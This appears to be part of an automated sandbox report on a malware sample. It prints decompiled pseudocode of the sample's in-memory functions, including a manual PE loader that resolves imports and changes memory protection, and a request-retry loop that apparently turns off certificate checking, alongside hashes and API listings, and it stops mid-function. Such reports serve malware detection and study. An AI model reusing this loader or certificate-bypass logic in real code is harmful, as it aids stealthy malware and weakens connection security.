                                                                                                                                                                                                                                • Instruction ID: 15aa04c3bc27f6a616b163e399bab3671953a494c5fd32767892492baf51f986
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3245e3e6cc31a91e6baef637decd9a9d8afdb5f0f51828592788d145206ce460
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59019E717003466FE7224A2ADC45FFB6B9DEF85344F849091B946CB342D6F0C842C761
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                			E02BB5B8B(intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                				long _t15;
                                                                                                                                                                                                                                				char* _t17;
                                                                                                                                                                                                                                				intOrPtr* _t19;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t19 = __imp__; // 0x7021e700
                                                                                                                                                                                                                                				_t22 =  ~_a8;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				asm("sbb esi, esi");
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                					if(_t14 != 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t15 = GetLastError();
                                                                                                                                                                                                                                					_v8 = _t15;
                                                                                                                                                                                                                                					if(_t15 != 0x2f8f) {
                                                                                                                                                                                                                                						if(_t15 == 0x2f00) {
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_v16 = 0x3300;
                                                                                                                                                                                                                                						if(_v12 == 0) {
                                                                                                                                                                                                                                							_t17 =  &_v16;
                                                                                                                                                                                                                                							__imp__(_a4, 0x1f, _t17, 4);
                                                                                                                                                                                                                                							if(_t17 == 0) {
                                                                                                                                                                                                                                								_v8 = GetLastError();
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_v12 = 1;
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L9;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB5BA8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,02BBA77A,00000000,?,?), ref: 02BB5BFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1452528299-1701360479
                                                                                                                                                                                                                                • Opcode ID: 543305b0812f37d83e6dfa7e286e7e783767f12eec00b0412e0b0757135fb234
                                                                                                                                                                                                                                • Instruction ID: fcc39aae8ebab8317493f2e08699bfc880457cb0238fb2af74eaeac6099fe9d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 543305b0812f37d83e6dfa7e286e7e783767f12eec00b0412e0b0757135fb234
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C012D75944208FFDB329F95D888AEEBFB8EF84755F5484A6E501E3140C7B08644DB62
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB53BB(void* _a4) {
                                                                                                                                                                                                                                				char _t2;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = RtlFreeHeap( *0x2bbd270, 0, _a4); // executed
                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                0x02bb53c7
                                                                                                                                                                                                                                0x02bb53cd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 5abaec03e50359c11367aee0d13d9c1d648dc15d354bccb3761b8d97345a219e
                                                                                                                                                                                                                                • Instruction ID: 48433187e9e1dc480471d6ad4dd17d3c3e606d6f36275595737f9d54d5eae613
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5abaec03e50359c11367aee0d13d9c1d648dc15d354bccb3761b8d97345a219e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACB012B1D80100AFCE238B50DF04F05BE31B750780F005822B34401070C2B14830FF15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                			E02BB6B85(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				intOrPtr* _t35;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                                                                                                				intOrPtr* _t43;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr* _t50;
                                                                                                                                                                                                                                				intOrPtr* _t52;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				intOrPtr* _t57;
                                                                                                                                                                                                                                				intOrPtr* _t61;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t55 = _a4;
                                                                                                                                                                                                                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                				_a4 = 0;
                                                                                                                                                                                                                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                				if(_t76 < 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					return _t76;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t40 = E02BB4A6A(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                				_t76 = _t40;
                                                                                                                                                                                                                                				if(_t76 >= 0) {
                                                                                                                                                                                                                                					_t61 = _a28;
                                                                                                                                                                                                                                					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                						_t52 = _v8;
                                                                                                                                                                                                                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t76 >= 0) {
                                                                                                                                                                                                                                						_t43 =  *_t55;
                                                                                                                                                                                                                                						_t68 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                						_t20 = _t68 + 0x2bbe1fc; // 0x740053
                                                                                                                                                                                                                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                						if(_t76 >= 0) {
                                                                                                                                                                                                                                							_t76 = E02BB5626(_a4);
                                                                                                                                                                                                                                							if(_t76 >= 0) {
                                                                                                                                                                                                                                								_t65 = _a28;
                                                                                                                                                                                                                                								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                									_t50 = _a4;
                                                                                                                                                                                                                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t45 = _a4;
                                                                                                                                                                                                                                						if(_t45 != 0) {
                                                                                                                                                                                                                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t57 = __imp__#6;
                                                                                                                                                                                                                                						if(_a20 != 0) {
                                                                                                                                                                                                                                							 *_t57(_a20);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                                                							 *_t57(_a12);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _v8;
                                                                                                                                                                                                                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                0x02bb6c37
                                                                                                                                                                                                                                0x02bb6c47
                                                                                                                                                                                                                                0x02bb6c47
                                                                                                                                                                                                                                0x02bb6c30
                                                                                                                                                                                                                                0x02bb6c29
                                                                                                                                                                                                                                0x02bb6c49
                                                                                                                                                                                                                                0x02bb6c4e
                                                                                                                                                                                                                                0x02bb6c53
                                                                                                                                                                                                                                0x02bb6c53
                                                                                                                                                                                                                                0x02bb6c56
                                                                                                                                                                                                                                0x02bb6c5f
                                                                                                                                                                                                                                0x02bb6c64
                                                                                                                                                                                                                                0x02bb6c64
                                                                                                                                                                                                                                0x02bb6c69
                                                                                                                                                                                                                                0x02bb6c6e
                                                                                                                                                                                                                                0x02bb6c6e
                                                                                                                                                                                                                                0x02bb6c69
                                                                                                                                                                                                                                0x02bb6bf3
                                                                                                                                                                                                                                0x02bb6c70
                                                                                                                                                                                                                                0x02bb6c76
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB4A6A: SysAllocString.OLEAUT32(80000002), ref: 02BB4AC7
                                                                                                                                                                                                                                  • Part of subcall function 02BB4A6A: SysFreeString.OLEAUT32(00000000), ref: 02BB4B2D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 02BB6C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(02BB48F5), ref: 02BB6C6E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: 393a9f478412837e96b0475ab1747f243c472596803d33568163cc97fed717c5
                                                                                                                                                                                                                                • Instruction ID: 657c5505e02338560062d7fd0c162eee51843f0e3560accc5217d09ef656197a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 393a9f478412837e96b0475ab1747f243c472596803d33568163cc97fed717c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66313872900119AFCB26DFA5C888CEBBB7AFFC97447144698F9059B210D772DD51CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B816C3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				intOrPtr* _v12;
                                                                                                                                                                                                                                				_Unknown_base(*)()** _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				signed short _v24;
                                                                                                                                                                                                                                				struct HINSTANCE__* _v28;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t49;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				signed short _t51;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t53;
                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t55;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                                				signed int _t68;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                				CHAR* _t71;
                                                                                                                                                                                                                                				signed short* _t73;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t69 = __edi;
                                                                                                                                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                				_t59 =  *0x2b841c0;
                                                                                                                                                                                                                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                                                                                                                                                                                                				if(_t43 != 0) {
                                                                                                                                                                                                                                					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                					_v12 = _t45;
                                                                                                                                                                                                                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                					if(_t46 != 0) {
                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                                                                                							_v28 = _t47;
                                                                                                                                                                                                                                							if(_t47 == 0) {
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                							 *_t71 = _t59 - 0x69b25f44;
                                                                                                                                                                                                                                							_t49 = _v12;
                                                                                                                                                                                                                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                							_t50 =  *_t49;
                                                                                                                                                                                                                                							if(_t50 != 0) {
                                                                                                                                                                                                                                								L6:
                                                                                                                                                                                                                                								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                                									_t51 =  *_t73;
                                                                                                                                                                                                                                									if(_t51 == 0) {
                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									if(__eflags < 0) {
                                                                                                                                                                                                                                										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                										if(_t51 < _t69) {
                                                                                                                                                                                                                                											L12:
                                                                                                                                                                                                                                											_t21 =  &_v8;
                                                                                                                                                                                                                                											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                											__eflags =  *_t21;
                                                                                                                                                                                                                                											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t65 = _a4;
                                                                                                                                                                                                                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                												goto L12;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												goto L11;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                										L11:
                                                                                                                                                                                                                                										_v8 = _t51;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t53 = _v8;
                                                                                                                                                                                                                                									__eflags = _t53;
                                                                                                                                                                                                                                									if(_t53 == 0) {
                                                                                                                                                                                                                                										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t54 = _t53 + 2;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                									__eflags = _t55;
                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                										_v20 = _t59 - 0x69b25ec5;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t68 = _v8;
                                                                                                                                                                                                                                										__eflags = _t68;
                                                                                                                                                                                                                                										if(_t68 != 0) {
                                                                                                                                                                                                                                											 *_t68 = _t59 - 0x69b25f44;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										 *_v16 = _t55;
                                                                                                                                                                                                                                										_t58 = 0x593682f4 + _t59 * 4;
                                                                                                                                                                                                                                										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                										_t32 =  &_v16;
                                                                                                                                                                                                                                										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                										__eflags =  *_t32;
                                                                                                                                                                                                                                										continue;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t50 = _t61;
                                                                                                                                                                                                                                								if(_t61 != 0) {
                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L26:
                                                                                                                                                                                                                                							goto L27;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t60 = _t59 + 0x964da13a;
                                                                                                                                                                                                                                						__eflags = _t60;
                                                                                                                                                                                                                                						_v20 = _t60;
                                                                                                                                                                                                                                						goto L26;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L27:
                                                                                                                                                                                                                                				return _v20;
                                                                                                                                                                                                                                			}




























                                                                                                                                                                                                                                0x02b817b4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b817ba
                                                                                                                                                                                                                                0x02b817c5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b817c5
                                                                                                                                                                                                                                0x02b817bc
                                                                                                                                                                                                                                0x02b817bc
                                                                                                                                                                                                                                0x02b817c2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b817c2
                                                                                                                                                                                                                                0x02b816f0
                                                                                                                                                                                                                                0x02b817c6
                                                                                                                                                                                                                                0x02b817cb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 02B816FB
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 02B8176D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2574300362-0
                                                                                                                                                                                                                                • Opcode ID: c1063cadc61a6334a026b84d621bafd45dd121ffa242b551e89cbe7819bae15a
                                                                                                                                                                                                                                • Instruction ID: a3294f64ab7a67c201731879d525e78bbdb7c37b81c0f3a93d7d7b397add9707
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1063cadc61a6334a026b84d621bafd45dd121ffa242b551e89cbe7819bae15a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A03117B9E12206DFDB14EF99D890AADB7F9FF04754B1444ADD809EB240E770EA42CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                			E02B81F7C(void* __eax) {
                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                				long _t26;
                                                                                                                                                                                                                                				long _t29;
                                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                				intOrPtr* _t42;
                                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t41 = __eax;
                                                                                                                                                                                                                                				_t16 =  *0x2b841c0;
                                                                                                                                                                                                                                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2b841c0 - 0x69b24f45 &  !( *0x2b841c0 - 0x69b24f45);
                                                                                                                                                                                                                                				_t18 = E02B81C61( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2b841c0 - 0x69b24f45 &  !( *0x2b841c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2b841c0 - 0x69b24f45 &  !( *0x2b841c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                				if(_t18 != 0) {
                                                                                                                                                                                                                                					_t29 = 8;
                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t40 = _v8;
                                                                                                                                                                                                                                					_t29 = E02B81AF2(_t33, _t40, _t41);
                                                                                                                                                                                                                                					if(_t29 == 0) {
                                                                                                                                                                                                                                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                                                                                						_t24 = E02B816C3(_t40, _t44); // executed
                                                                                                                                                                                                                                						_t29 = _t24;
                                                                                                                                                                                                                                						if(_t29 == 0) {
                                                                                                                                                                                                                                							_t26 = E02B81B7F(_t44, _t40); // executed
                                                                                                                                                                                                                                							_t29 = _t26;
                                                                                                                                                                                                                                							if(_t29 == 0) {
                                                                                                                                                                                                                                								_push(_t26);
                                                                                                                                                                                                                                								_push(1);
                                                                                                                                                                                                                                								_push(_t40);
                                                                                                                                                                                                                                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                                                                                									_t29 = GetLastError();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t42 = _v12;
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                                                                                					E02B81F0A(_t42);
                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                					return _t29;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,02B81FB8,?,?,?,?,?,00000002,?,?), ref: 02B81C85
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CA7
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CBD
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CD3
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CE9
                                                                                                                                                                                                                                  • Part of subcall function 02B81C61: GetProcAddress.KERNEL32(00000000,?), ref: 02B81CFF
                                                                                                                                                                                                                                  • Part of subcall function 02B81AF2: memcpy.NTDLL(00000002,?,02B81FC6,?,?,?,?,?,02B81FC6,?,?,?,?,?,?,?), ref: 02B81B29
                                                                                                                                                                                                                                  • Part of subcall function 02B81AF2: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 02B81B5E
                                                                                                                                                                                                                                  • Part of subcall function 02B816C3: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 02B816FB
                                                                                                                                                                                                                                  • Part of subcall function 02B81B7F: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 02B81BB8
                                                                                                                                                                                                                                  • Part of subcall function 02B81B7F: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 02B81C2D
                                                                                                                                                                                                                                  • Part of subcall function 02B81B7F: GetLastError.KERNEL32 ref: 02B81C33
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 02B81FFA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 2673762927-1084903527
                                                                                                                                                                                                                                • Opcode ID: b122a361aca7bd04afa9c8628c48901cf36d135efaa18c2d6fb02c0cbf19acd2
                                                                                                                                                                                                                                • Instruction ID: 07834695ae6b84c8ea6034282305ef7543c25f84c95c66da3472207a2f7c7f3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b122a361aca7bd04afa9c8628c48901cf36d135efaa18c2d6fb02c0cbf19acd2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9112B36601315AFD721BA99CC80EAB77BDEF883147000599EE0E97200EBB1EC06CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81064() {
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void _v32;
                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                				int _t26;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t15 =  *0x2b841c4;
                                                                                                                                                                                                                                				if( *0x2b841ac > 5) {
                                                                                                                                                                                                                                					_t16 = _t15 + 0x2b850f9;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t16 = _t15 + 0x2b850b1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E02B814A8(_t16, _t16);
                                                                                                                                                                                                                                				_t36 = 6;
                                                                                                                                                                                                                                				memset( &_v32, 0, _t36 << 2);
